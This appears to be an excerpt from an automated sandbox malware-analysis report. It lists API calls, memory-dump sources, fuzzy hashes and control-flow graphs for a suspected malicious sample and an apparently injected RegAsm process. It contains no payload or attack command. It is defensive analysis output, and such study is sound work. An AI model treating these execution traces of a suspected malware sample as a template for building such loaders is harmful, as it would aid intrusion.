• Instruction ID: 11645f3e62ae4153ffc7bc8edcd949a4e030ca3f943487ed181104cc803f5a22
• Opcode Fuzzy Hash: 53bffac545b53acb6ec3a7bc6905fcaf6b435cee85a0ee9aebdf129ee28c1c3b
• Instruction Fuzzy Hash: E0F0EC3570024557CB04AF35DC45A6ABF96EFC17A4B0A405DFA058F751C776D843D790
APIs
• GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,?,?,?,?,00FC9AA2,?,20001004,00000000,00000002), ref: 00FCB361
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
• Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 2e0fbbec124b1e66188b962e8e489a421bb47cb73cc19503f436260a13d3d9f3
• Instruction ID: ad9d7cff4051c23f8ce95160236a5625fb5af7dbb326444f40308a2b3202db1e
• Opcode Fuzzy Hash: 2e0fbbec124b1e66188b962e8e489a421bb47cb73cc19503f436260a13d3d9f3
• Instruction Fuzzy Hash: 7FE09A3690015DBBCF122F60EC0AFEE3B2ABB40760F040018FD0565120CB768920BAA0
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
• Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
Yara matches
Similarity
• API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
• String ID:
• API String ID: 3471368781-0
• Opcode ID: 51b36cf4f215ccec0dbda9f34d4dccae3ae36053e52d0890d8158a8b4e7a8ad0
• Instruction ID: 8a6263493453ba3e8fff28912e3603619fe0be3bbb109f1910dc0b9bbd66aa76
• Opcode Fuzzy Hash: 51b36cf4f215ccec0dbda9f34d4dccae3ae36053e52d0890d8158a8b4e7a8ad0
• Instruction Fuzzy Hash: F4B118359007059BCB389B24CC92BB7B3EAEF44758F58452EE983C6740EE75E942E711
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,29949A30,?,?,00000000,00FE7EF1,000000FF,?,00FC60B1,?,?,00FC6085,00FE7ED4), ref: 00FC615F
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FC6171
• FreeLibrary.KERNEL32(00000000,?,?,00000000,00FE7EF1,000000FF,?,00FC60B1,?,?,00FC6085,00FE7ED4), ref: 00FC6193
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
• Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
Yara matches
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 2f9f3d06b8ca36615c2d89680dc2d8cf9567bd33cd4a318ae67adadf185cfb4c
• Instruction ID: 6e9b72b20ec5303a3736c490ea690dc32b83499eda0f693e0228120dfb4366d4
• Opcode Fuzzy Hash: 2f9f3d06b8ca36615c2d89680dc2d8cf9567bd33cd4a318ae67adadf185cfb4c
• Instruction Fuzzy Hash: AD01A731948699AFCB118B51CC49FEE77B8FB04B25F040629F812E6690D7B59900DA90
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00F6503C
• int.LIBCPMT ref: 00F6504F
  • Part of subcall function 00F61C6B: std::_Lockit::_Lockit.LIBCPMT ref: 00F61C7C
  • Part of subcall function 00F61C6B: std::_Lockit::~_Lockit.LIBCPMT ref: 00F61C96
• std::_Facet_Register.LIBCPMT ref: 00F65082
• std::_Lockit::~_Lockit.LIBCPMT ref: 00F65098
• Concurrency::cancel_current_task.LIBCPMT ref: 00F650A3
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
• Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
• String ID:
• API String ID: 2081738530-0
• Opcode ID: 8b1053777a694989fba2715e35332ae161788cb0bbf8d6ff289a15d218d7b246
• Instruction ID: 53f827790e12ef62ccb336133bf1da47b34d8d1eca6656787a7de763ef32d3a8
• Opcode Fuzzy Hash: 8b1053777a694989fba2715e35332ae161788cb0bbf8d6ff289a15d218d7b246
• Instruction Fuzzy Hash: FE012B72900915BBCB15ABA4DC469DE776CEF81720F144149F801AB282EF75DE01A7D0
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00F61B7A
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F61BB2
  • Part of subcall function 00F6B9E9: _Yarn.LIBCPMT ref: 00F6BA08
  • Part of subcall function 00F6B9E9: _Yarn.LIBCPMT ref: 00F6BA2C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
• Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
Yara matches
Similarity
• API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
• String ID: bad locale name
• API String ID: 1908188788-1405518554
• Opcode ID: 762e735a2e8480c1dea7b728701da7e3ecbdb72144e3237229d879980592661f
• Instruction ID: 97ec0d1191baf5a5039838f97c75a039076e45e47f960135b766245325a790d7
• Opcode Fuzzy Hash: 762e735a2e8480c1dea7b728701da7e3ecbdb72144e3237229d879980592661f
• Instruction Fuzzy Hash: 58F01771509B409E83319F7A9881447FBE4BE283203948A2FE1DEC3A11D774E444DB6A
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 00F61516
  • Part of subcall function 00F69E64: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00F69E70
  • Part of subcall function 00F69E64: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00F69E90
  • Part of subcall function 00F69E64: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00F69EB0
  • Part of subcall function 00F69E64: std::regex_error::regex_error.LIBCPMT ref: 00F69ED0
• std::exception::exception.LIBCONCRT ref: 00F61523
  • Part of subcall function 00F612A0: ___std_exception_copy.LIBVCRUNTIME ref: 00F612C7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
• Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
Yara matches
Similarity
• API ID: std::invalid_argument::invalid_argument$Xinvalid_argument___std_exception_copystd::_std::exception::exceptionstd::regex_error::regex_error
• String ID: string too long
• API String ID: 1410275967-2556327735
• Opcode ID: f7c3d894b8a7b054f521428ccf0896bfc59e3b3c1c93018d1038a1592819af29
• Instruction ID: 222551e671846f17b66d36ef7293dd5135a78a74f1233ac0c4911ce65fe2e244
• Opcode Fuzzy Hash: f7c3d894b8a7b054f521428ccf0896bfc59e3b3c1c93018d1038a1592819af29
• Instruction Fuzzy Hash: 5BC08C712083211383306A505C0188BBA44DF507A0701481ABA8482219DABA8880B2F1

                                                                                      Execution Graph

                                                                                      Execution Coverage:15.9%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:20%
                                                                                      Total number of Nodes:10
                                                                                      Total number of Limit Nodes:0
                                                                                      execution_graph 3692 1212e1b 3696 12132f0 3692->3696 3700 12132e7 3692->3700 3693 1212e21 3699 1213312 3696->3699 3697 1213383 LdrInitializeThunk 3698 12133a1 3697->3698 3698->3693 3699->3697 3703 12132f0 3700->3703 3701 1213383 LdrInitializeThunk 3702 12133a1 3701->3702 3702->3693 3703->3701

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 65 12132f0-1213310 66 1213312 65->66 67 1213317-121339f call 12135b1 call 121868c LdrInitializeThunk 65->67 66->67 71 12133a1 67->71 72 12133a6-12133ed 67->72 71->72 75 1213576-121357f 72->75 76 12133f2-12133fb 75->76 77 1213585-1213596 75->77 78 1213402-121342a 76->78 79 12133fd 76->79 82 1213431-1213454 78->82 83 121342c 78->83 79->78 85 1213456 82->85 86 121345b-1213472 82->86 83->82 85->86 88 1213480-1213486 86->88 89 1213474-121347e 86->89 90 1213489-1213496 88->90 89->90 91 1213498 90->91 92 121349d-12134aa 90->92 91->92 93 12134b1-1213573 92->93 94 12134ac 92->94 93->75 94->93
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.4120554570.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_1210000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 8707ad2f6870b18a6453f33536626776a9238188b58d4ec997f3eb37e95761f4
                                                                                      • Instruction ID: ada15b8d6b851a24fa6079c9310c20cb5b0e331023cdeee8e09c9f8859efe8e4
                                                                                      • Opcode Fuzzy Hash: 8707ad2f6870b18a6453f33536626776a9238188b58d4ec997f3eb37e95761f4
                                                                                      • Instruction Fuzzy Hash: 4381A074E00219DFDB14DFAAD584A9DBBF2BF88310F14C069E918AB319DB30A885CF54

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 106 12132e7-1213310 108 1213312 106->108 109 1213317-121339f call 12135b1 call 121868c LdrInitializeThunk 106->109 108->109 113 12133a1 109->113 114 12133a6-12133ed 109->114 113->114 117 1213576-121357f 114->117 118 12133f2-12133fb 117->118 119 1213585-1213596 117->119 120 1213402-121342a 118->120 121 12133fd 118->121 124 1213431-1213454 120->124 125 121342c 120->125 121->120 127 1213456 124->127 128 121345b-1213472 124->128 125->124 127->128 130 1213480-1213486 128->130 131 1213474-121347e 128->131 132 1213489-1213496 130->132 131->132 133 1213498 132->133 134 121349d-12134aa 132->134 133->134 135 12134b1-1213573 134->135 136 12134ac 134->136 135->117 136->135
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.4120554570.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_1210000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 73d43d213a7228a5e398d3c04ddf95682ff25f34e0306c4b3534cf3609727e33
                                                                                      • Instruction ID: 16ace5a6933215d6fc7f86538044aa04c17becff9e5a0605e371bde52174a3ff
                                                                                      • Opcode Fuzzy Hash: 73d43d213a7228a5e398d3c04ddf95682ff25f34e0306c4b3534cf3609727e33
                                                                                      • Instruction Fuzzy Hash: 3F417275E012199BDB18CFAAD94499DFBF3BF88310F14C12AD818AB318EB349946CF51

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 343 1212e1b 406 1212e1b call 12132f0 343->406 407 1212e1b call 12132e7 343->407 344 1212e21-1212e36 345 121328a-1213293 344->345 346 1213299-12132c0 345->346 347 1212e3b-1212e44 345->347 348 1212e46 347->348 349 1212e4b-1212e7c 347->349 348->349 352 1212e83-1212eac 349->352 353 1212e7e 349->353 357 1212eb3-1212ee1 352->357 358 1212eae 352->358 353->352 360 1212ee3 357->360 361 1212ee8-1212f11 357->361 358->357 360->361 363 1212f13 361->363 364 1212f18-1212f49 361->364 363->364 366 1212f50-1212f79 364->366 367 1212f4b 364->367 369 1212f80-1212fb4 366->369 370 1212f7b 366->370 367->366 372 1212fb6 369->372 373 1212fbb-1213005 369->373 370->369 372->373 376 1213007 373->376 377 121300c-121303e 373->377 376->377 379 1213040 377->379 380 1213045-12130d3 377->380 379->380 382 12131a9-1213272 380->382 383 12130d9-12131a4 380->383 404 1213273-1213287 382->404 383->404 404->345 406->344 407->344
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.4120554570.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_1210000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 925d58c238a55d752a50437cd65d9c34fc37b6906a221e59eab68c389a10aeec
                                                                                      • Instruction ID: c9037c1a1c6f924e359229da0ab3152d964e9fac868d8e88dfdcfc0585aa6382
                                                                                      • Opcode Fuzzy Hash: 925d58c238a55d752a50437cd65d9c34fc37b6906a221e59eab68c389a10aeec
                                                                                      • Instruction Fuzzy Hash: B6D1AC74E01229CFDB64DFA8D984B9DBBB2BF48300F2081A9E409A7355DB30AD85CF55
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.4120554570.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_1210000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d271234273b3a7ae30b12dc5ebfdb07e9952ac1356666230945931fd3ce361de
                                                                                      • Instruction ID: 250bc1d1729188c9f2c844e34bd4dc09c0ae934c137d7ee203210e023718bc32
                                                                                      • Opcode Fuzzy Hash: d271234273b3a7ae30b12dc5ebfdb07e9952ac1356666230945931fd3ce361de
                                                                                      • Instruction Fuzzy Hash: DF4144B4E012589FDB50CFA8D598BDDBBF0BB09314F20412AE818BB394D7B99949CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.4120554570.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_1210000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e95c0a4d868a45e144bb1dff3277bb17f0ba002d15029a8ca76fde6081718775
                                                                                      • Instruction ID: f52aaa51673cd646e9b94222416c31c118b3c976e36297186f807c9f98e27c0c
                                                                                      • Opcode Fuzzy Hash: e95c0a4d868a45e144bb1dff3277bb17f0ba002d15029a8ca76fde6081718775
                                                                                      • Instruction Fuzzy Hash: CE31CCB5D04258DFCB10CFA9D584AEEFBF4EB09310F24906AE414B7214D774A989CF68
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.4120554570.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_1210000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 994c4389b120957dc51aa25afd195ec888ac63478784eebec63fc4adc6b6c9b2
                                                                                      • Instruction ID: 75ced642f3744a7527c4533864006bfc1f74f4f80689ba9bcf7f2bdcb1ff486e
                                                                                      • Opcode Fuzzy Hash: 994c4389b120957dc51aa25afd195ec888ac63478784eebec63fc4adc6b6c9b2
                                                                                      • Instruction Fuzzy Hash: 1731DDB5D05258DFCB00CFA9D484AEEFBF4AF49310F24906AE454B7214D774A989CF68